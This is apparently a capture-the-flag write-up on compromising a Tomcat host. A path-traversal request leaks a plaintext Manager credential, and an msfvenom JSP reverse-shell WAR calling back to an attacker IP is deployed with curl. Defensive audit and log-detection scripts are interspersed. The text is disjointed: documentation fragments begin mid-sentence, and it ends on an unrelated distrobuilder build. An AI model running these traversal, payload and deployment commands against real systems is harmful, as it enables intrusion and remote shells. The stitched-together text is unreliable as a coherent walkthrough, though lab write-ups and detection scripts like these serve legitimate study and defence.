```
# Nmap 7.80 scan initiated Sat Aug 8 13:09:36 2020 as: nmap -p- -sSVC -oA nmap_full -v 10.10.10.194
Increasing send delay for 10.10.10.194 from 0 to 5 due to 649 out of 2162 dropped probes since last increase.
Nmap scan report for 10.10.10.194
Host is up (0.032s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 338ABBB5EA8D80B9869555ECA253D49D
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open  http    Apache Tomcat
| http-methods:
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 8 13:28:24 2020 -- 1 IP address (1 host up) scanned in 1127.63 seconds
```
So it seems the Ubuntu package lays out the files differently from the Apache defaults: the users file is not `$TOMCAT_HOME/conf/tomcat-users.xml` but `$TOMCAT_HOME/etc/tomcat-users.xml`.
```
$ curl 'http://megahosting.htb/news.php?file=../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml'
<?xml version="1.0" encoding="UTF-8"?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
<!--
  NOTE:  By default, no user is included in the "manager-gui" role required
  to operate the "/manager/html" web application.  If you wish to use this app,
  you must define such a user - the username and password are arbitrary. It is
  strongly recommended that you do NOT use one of the users in the commented out
  section below since they are intended for use with the examples web
  application.
-->
<!--
  NOTE:  The sample user and role entries below are intended for use with the
  examples web application. They are wrapped in a comment and thus are ignored
  when reading this file. If you wish to configure these users for use with the
  examples web application, do not forget to remove the <!.. ..> that surrounds
  them. You will also need to set the passwords to something appropriate.
-->
<!--
  <role rolename="tomcat"/>
  <role rolename="role1"/>
  <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
  <user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
  <user username="role1" password="<must-be-changed>" roles="role1"/>
-->
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
</tomcat-users>
```
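Two things made the file above worth reading: it holds a plaintext credential for an account with Manager roles, and it was readable by the web server user. The following script is an added example for this write-up (not tooling from the box, from the author, or from Tomcat) that checks both conditions on any `tomcat-users.xml`: it lists every user holding a role that grants Manager or Host Manager access, and reports when the file mode lets group or other read it. The privileged role names are the ones documented for the Tomcat Manager application; the sample XML embedded below is the users block recovered above, stripped of the license and comment text.

```python
"""Audit a tomcat-users.xml for Manager-capable accounts and loose file permissions.

Added example for this write-up; not code from the original post or from Tomcat.
Only the Python standard library is used.
"""
import os
import stat
import xml.etree.ElementTree as ET

# Roles that grant control over the Manager / Host Manager web applications
# (names as listed in the Tomcat Manager documentation).
PRIVILEGED_ROLES = {
    "manager-gui", "manager-script", "manager-jmx", "manager-status",
    "admin-gui", "admin-script",
}

# Sample input: the active users/roles block read from the target above,
# reduced to the elements that matter for the audit.
SAMPLE_XML = """<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
</tomcat-users>
"""


def _local(tag):
    """Strip the XML namespace so the check works with or without the xmlns declaration."""
    return tag.split("}", 1)[1] if tag.startswith("{") else tag


def privileged_users(xml_text):
    """Return {username: sorted privileged roles} for every user that holds at least one."""
    root = ET.fromstring(xml_text)
    result = {}
    for el in root.iter():
        if _local(el.tag) != "user":
            continue
        # Tomcat accepts both spellings of the attribute; "name" is the older one.
        name = el.get("username") or el.get("name")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        hits = sorted(roles & PRIVILEGED_ROLES)
        if hits:
            result[name] = hits
    return result


def mode_readable_by_others(mode):
    """True when a st_mode value grants read to group or other."""
    return bool(mode & (stat.S_IRGRP | stat.S_IROTH))


def readable_by_others(path):
    """True when the file on disk can be read by group or other (e.g. by www-data via an LFI)."""
    return mode_readable_by_others(os.stat(path).st_mode)


def audit(xml_text, path=None):
    """Combine both checks into a list of findings; path is optional so the XML alone can be audited."""
    findings = []
    for user, roles in privileged_users(xml_text).items():
        findings.append(f"user '{user}' holds privileged role(s): {', '.join(roles)}")
    if path is not None and readable_by_others(path):
        findings.append(f"{path} is readable by group/other; restrict it to the tomcat user")
    return findings


if __name__ == "__main__":
    # Run against the embedded sample; pass a real path as the second argument
    # to also check the on-disk permissions.
    for finding in audit(SAMPLE_XML):
        print(finding)
```

On a real host, call `audit(open(path).read(), path)` with the Ubuntu location `/usr/share/tomcat9/etc/tomcat-users.xml` (or `/etc/tomcat9/tomcat-users.xml`, which it symlinks to); any account it reports that is not strictly needed should lose the role, and the file should be owned by root with group `tomcat` and mode 640.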
where {host} and {port} represent the hostname and port number on which Tomcat is running, {command} represents the Manager command you wish to execute, and {parameters} represents the query parameters that are specific to that command. In the illustrations below, customize the host and port appropriately for your installation.
The commands are usually executed by HTTP GET requests. The /deploy command has a form that is executed by an HTTP PUT request.
Then we can read the section "Deploy A New Application Archive (WAR) Remotely":
Upload the web application archive (WAR) file that is specified as the request data in this HTTP PUT request, install it into the appBase directory of our corresponding virtual host, and start, deriving the name for the WAR file added to the appBase from the specified path. The application can later be undeployed (and the corresponding WAR file removed) by use of the /undeploy command.
This command is executed by an HTTP PUT request.
Let's craft a WAR reverse shell.
```
$ msfvenom --list payloads | grep -i jsp
    java/jsp_shell_bind_tcp        Listen for a connection and spawn a command shell
    java/jsp_shell_reverse_tcp     Connect back to attacker and spawn a command shell

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.49 LPORT=9999 -f war > revshell.war
```
```
$ curl -X PUT -u 'tomcat':'$3cureP4s5w0rd123!' -T revshell.war 'http://tabby.htb:8080/manager/text/deploy?path=/noraj'
OK - Deployed application at context path [/noraj]
```
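Both requests used so far leave clear traces in the web server logs: the `news.php?file=` read shows up as a query parameter full of `../`, and the WAR upload is an authenticated `PUT` to `/manager/text/deploy`. The script below is an added example for this write-up (not a rule from any product and not code from the original post) that parses Apache/Tomcat common-format access log lines and flags both patterns. The log lines are constructed for the example and mirror the paths used above; the traversal check decodes each query value once so `%2e%2e%2f` style encoding is caught as well.

```python
"""Flag LFI-style traversal and Tomcat Manager deployments in access logs.

Added example for this write-up; not code from the original post.
Standard library only.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Common/combined log format: ip ident user [time] "method target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Manager endpoints that accept a WAR: the text interface used above and the HTML form upload.
MANAGER_DEPLOY = ("/manager/text/deploy", "/manager/html/upload")

# Constructed sample log; the paths follow the requests made earlier in the write-up.
SAMPLE_LOG = """\
10.10.14.49 - - [08/Aug/2020:13:40:01 +0000] "GET /news.php?file=statement HTTP/1.1" 200 1234
10.10.14.49 - - [08/Aug/2020:13:41:17 +0000] "GET /news.php?file=../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml HTTP/1.1" 200 2150
10.10.14.49 - - [08/Aug/2020:13:42:03 +0000] "GET /news.php?file=..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1980
10.10.14.49 - tomcat [08/Aug/2020:13:50:22 +0000] "PUT /manager/text/deploy?path=/noraj HTTP/1.1" 200 47
10.10.14.49 - - [08/Aug/2020:13:51:00 +0000] "GET /noraj/ HTTP/1.1" 200 0
"""


def parse_line(line):
    """Return the log fields as a dict, or None when the line does not match the format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def has_traversal(target):
    """True if any query value contains a parent-directory step.

    parse_qsl already percent-decodes once; unquote() again so a double-encoded
    value is also caught.
    """
    query = urlsplit(target).query
    for _, value in parse_qsl(query, keep_blank_values=True):
        decoded = unquote(value)
        if "../" in decoded or "..\\" in decoded or decoded.endswith(".."):
            return True
    return False


def is_manager_deploy(method, target):
    """True for a PUT/POST that targets one of the Manager WAR-deployment endpoints."""
    path = urlsplit(target).path
    return method in ("PUT", "POST") and path.startswith(MANAGER_DEPLOY)


def detect(log_text):
    """Return (line_no, reason, source_ip, http_user) for every suspicious line."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue
        if has_traversal(rec["target"]):
            findings.append((line_no, "path traversal in query string", rec["ip"], rec["user"]))
        if is_manager_deploy(rec["method"], rec["target"]):
            findings.append((line_no, "WAR deployment via Tomcat Manager", rec["ip"], rec["user"]))
    return findings


if __name__ == "__main__":
    for line_no, reason, ip, user in detect(SAMPLE_LOG):
        print(f"line {line_no}: {reason} from {ip} (user {user})")
```

The Manager hit carries the authenticated username (`tomcat` here), which ties the deployment to the credential that leaked through the traversal request a few lines earlier; a deployment from an account that never deploys WARs, or from an address that also produced traversal hits, is the pairing worth alerting on.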
```
$ sudo pacman -S go debootstrap rsync gnupg squashfs-tools git --needed
$ go get -d -v github.com/lxc/distrobuilder/distrobuilder
$ cd $HOME/go/src/github.com/lxc/distrobuilder
$ make
$ cd
```